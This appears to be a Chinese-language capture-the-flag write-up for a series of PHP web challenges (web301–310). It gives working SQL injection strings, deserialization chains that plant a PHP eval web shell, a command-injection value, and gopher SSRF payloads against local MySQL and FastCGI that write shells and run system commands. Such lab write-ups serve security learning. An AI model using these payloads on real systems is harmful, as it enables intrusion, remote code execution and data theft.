web301
data:image/s3,"s3://crabby-images/c99af/c99afddfc6bbccd81bb7c3869228c8e36f9d9cc4" alt="image-20220327192703217"
data:image/s3,"s3://crabby-images/4ffd7/4ffd79de9d1cb2740090a3699009e9cffa3d48ea" alt="image-20220327192725282"
data:image/s3,"s3://crabby-images/668d7/668d7cfc4ddc9ac813810d2c40541c0677570bbf" alt="image-20220327192821196"
好多php
checklogin.php
<?php error_reporting(0); session_start(); require 'conn.php'; $_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; $_POST['userpwd']=!empty($_POST['userpwd'])?$_POST['userpwd']:""; $username=$_POST['userid']; $userpwd=$_POST['userpwd']; $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=$result->fetch_array(MYSQLI_BOTH); if($result->num_rows<1){ $_SESSION['error']="1"; header("location:login.php"); return; } if(!strcasecmp($userpwd,$row['sds_password'])){ $_SESSION['login']=1; $result->free(); $mysqli->close(); header("location:index.php"); return; } $_SESSION['error']="1"; header("location:login.php");
?>
|
映入眼帘的sql注入,没过滤单引号闭合
userid=-1'union select 1 from sds_user%23&userpwd=1&userpwd=1
|
web302
data:image/s3,"s3://crabby-images/dd709/dd709d784e74ba517336e2a54ab878112c7c3995" alt="image-20220331132735111"
告诉了修改的地方
fun.php
<?php function sds_decode($str){ return md5(md5($str.md5(base64_encode("sds")))."sds"); } ?>
|
那么如果输入密码是1的话就是
sds->c2Rz->7e460169ddd8e459904627de0afe058e->17e460169ddd8e459904627de0afe058e->876c2c5e063cc5e89b1997427b8127dc->876c2c5e063cc5e89b1997427b8127dcsds->d9c77c4e454869d5d8da3b4be79694d3
|
使用hackerbar成功不了
-1' union select "d9c77c4e454869d5d8da3b4be79694d3"# 1
|
data:image/s3,"s3://crabby-images/108e5/108e557d14b326b0cb4736f9928575f7a0753fd4" alt="image-20220331135335974"
data:image/s3,"s3://crabby-images/1ce1e/1ce1e36d4dfa98fd3c932194ef0736975ed2261f" alt="image-20220331135341775"
web303
data:image/s3,"s3://crabby-images/5e81c/5e81c7eeafbe724af41cca0be163bc324831cdf4" alt="image-20220414203400434"
admin admin 弱口令登进去了
data:image/s3,"s3://crabby-images/a726d/a726d85acd537f425d07dc735542f63669762bb4" alt="image-20220414203452997"
这里存在明显注入点
data:image/s3,"s3://crabby-images/c78fe/c78fec5d96d4e75d55876ca2c16e7eaec5b25d5b" alt="image-20220414203557337"
这里进行了回显
1',sds_address =(select database())#
|
data:image/s3,"s3://crabby-images/94334/94334592d11a38dfe0c9e3ccfaf48016a4c1f033" alt="image-20220414203803823"
data:image/s3,"s3://crabby-images/4cf3a/4cf3a27f969de359e58be629c1fa3aee98bc8598" alt="image-20220414203827112"
1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#
|
1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name='sds_fl9g')#
|
1',sds_address =(select flag from sds_fl9g)#
|
web304
增加了全局waf
function sds_waf($str){ return preg_match('/[0-9]|[a-z]|-/i', $str); }
|
data:image/s3,"s3://crabby-images/30959/309597a4fd14694ea103c38418ba11e808be4d12" alt="image-20220414204444737"
data:image/s3,"s3://crabby-images/18300/18300df5706aef1ebe8a74bcef016f2777b942d7" alt="image-20220414204448997"
1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name='sds_flaag')#
|
1',sds_address =(select flag from sds_flaag)#
|
data:image/s3,"s3://crabby-images/4864f/4864f0d5abb6a893d9d2aa08a34465a04da58bc0" alt="image-20220414204556753"
web305
data:image/s3,"s3://crabby-images/98553/98553f7a267af470da0479ed8f8b7733b2b9a81a" alt="image-20220414204756442"
有waf但是在class.php
checklogin.php
<?php error_reporting(0); session_start(); require 'conn.php'; require 'fun.php'; require 'class.php'; $user_cookie = $_COOKIE['user']; if(isset($user_cookie)){ $user = unserialize($user_cookie); }
|
class.php
<?php
class user{ public $username; public $password; public function __construct($u,$p){ $this->username=$u; $this->password=$p; } public function __destruct(){ file_put_contents($this->username, $this->password); } }
|
简单反序列化
<?php
class user{ public $username; public $password; public function __construct(){ $this->username='zf.php'; $this->password='<?php @eval($_POST[zf]);?>'; } } $final = new user(); echo urlencode(serialize($final));
|
去checklogin.php登录哦
data:image/s3,"s3://crabby-images/c7bb3/c7bb31fca6c43f9dade346fd9fc4d04b28fbf528" alt="image-20220414212700875"
data:image/s3,"s3://crabby-images/4b13f/4b13fbd49baed61c433e6a3d8655112e7f8f8b70" alt="image-20220414212707269"
data:image/s3,"s3://crabby-images/f7eef/f7eefe3a8c7bc2e04829d72011a89c2c684fdbe8" alt="image-20220414213059226"
为啥给的不对,还有要用mysqli
data:image/s3,"s3://crabby-images/08461/08461a8dd0134bb06cb02f5e97e7ecb8f01e1f60" alt="image-20220414213129873"
web306
data:image/s3,"s3://crabby-images/e7a5f/e7a5f4af97c8faca16955dba493afb61bbf347e1" alt="image-20220414213739951"
搜一下class看看有没有能用的
data:image/s3,"s3://crabby-images/476b2/476b238404332f3b966f07f8e4800b6c9b91cbde" alt="image-20220414213933273"
data:image/s3,"s3://crabby-images/28aaf/28aaf6aa7cde68bb3cf47a062c28194ecceba2f1" alt="image-20220414213941190"
简单反序列化
<?php class log{ public $title='zf.php'; public $info='<?php @eval($_POST[zf]);?>';
} class dao{ private $conn;
public function __construct(){ $this->conn=new log();
}
} $final = new dao(); echo base64_encode(serialize($final));
|
data:image/s3,"s3://crabby-images/d2b96/d2b96d5c21baaf263fbc35f04c9d052d35537f9c" alt="image-20220414215324382"
data:image/s3,"s3://crabby-images/36819/36819ef3cf76eb39a3f638be3d614e15a16af11c" alt="image-20220414215333824"
data:image/s3,"s3://crabby-images/3c70b/3c70b0bf964b54ff63afe586c4fe9482e685625e" alt="image-20220414215417798"
web307
<?php
class config{ public $cache_dir = ';mv /var/www/html/flag.php /var/www/html/flag.txt;'; }
class dao{ private $config; public function __construct() { $this->config = new config(); } }
$final = new dao(); echo base64_encode(serialize($final));
|
logout.php好用
data:image/s3,"s3://crabby-images/194ad/194adbe4c8a54e5f80b92dcf044688ade4a783d5" alt="image-20220414222846939"
data:image/s3,"s3://crabby-images/556de/556de0d367c229357bd4cb7316fa7b4aa3e7fea6" alt="image-20220414222855740"
web308
gopher打无密码mysql
data:image/s3,"s3://crabby-images/b965b/b965b8c692917df8904422cccdaf56bb00fc7527" alt="image-20220414223317135"
找一下ssrf的利用链
data:image/s3,"s3://crabby-images/0c79e/0c79e464f6af4c031f8d9e37b04253e796d330fc" alt="image-20220410141702883"
<?php class config{ public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%49%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%7a%66%27%5d%29%3b%3f%3e%22%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%7a%66%2e%70%68%70%27%01%00%00%00%01'; } class dao{ private $config; public function __construct(){ $this->config=new config(); }
} $a=new dao(); echo base64_encode(serialize($a));
|
data:image/s3,"s3://crabby-images/9bbb3/9bbb3859522fc7fd3f579b2fdf89b2c7021c8ced" alt="image-20220414224259755"
web309
gophar打fastcgi
<?php class config{ public $update_url = 'gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%00%F6%06%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH58%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%09SCRIPT_FILENAMEindex.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3A%04%00%3C%3Fphp%20system%28%27cat%20f%2A%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00'; } class dao{ private $config; public function __construct(){ $this->config=new config(); }
} $a=new dao(); echo base64_encode(serialize($a));
|
data:image/s3,"s3://crabby-images/aa940/aa940f415943bd53923ba81b8eb0e76b4a6b933d" alt="image-20220414225717035"
web310
ssrf读配置文件
9000和6379都是关着的。那我们可以试试读下配置文件
<?php class config{ public $update_url = 'file:///etc/nginx/nginx.conf'; } class dao{ private $config; public function __construct(){ $this->config=new config(); }
} $a=new dao(); echo base64_encode(serialize($a));
|
data:image/s3,"s3://crabby-images/42255/422559f641d7f3acc3ec2263a06bf29d30c6df18" alt="image-20220414225358966"
<?php class config{ public $update_url = 'http://127.0.0.1:4476'; } class dao{ private $config; public function __construct(){ $this->config=new config(); }
} $a=new dao(); echo base64_encode(serialize($a));
|
data:image/s3,"s3://crabby-images/a8a30/a8a30427f6ece48d49886aac388b136b30c59d32" alt="image-20220414225448999"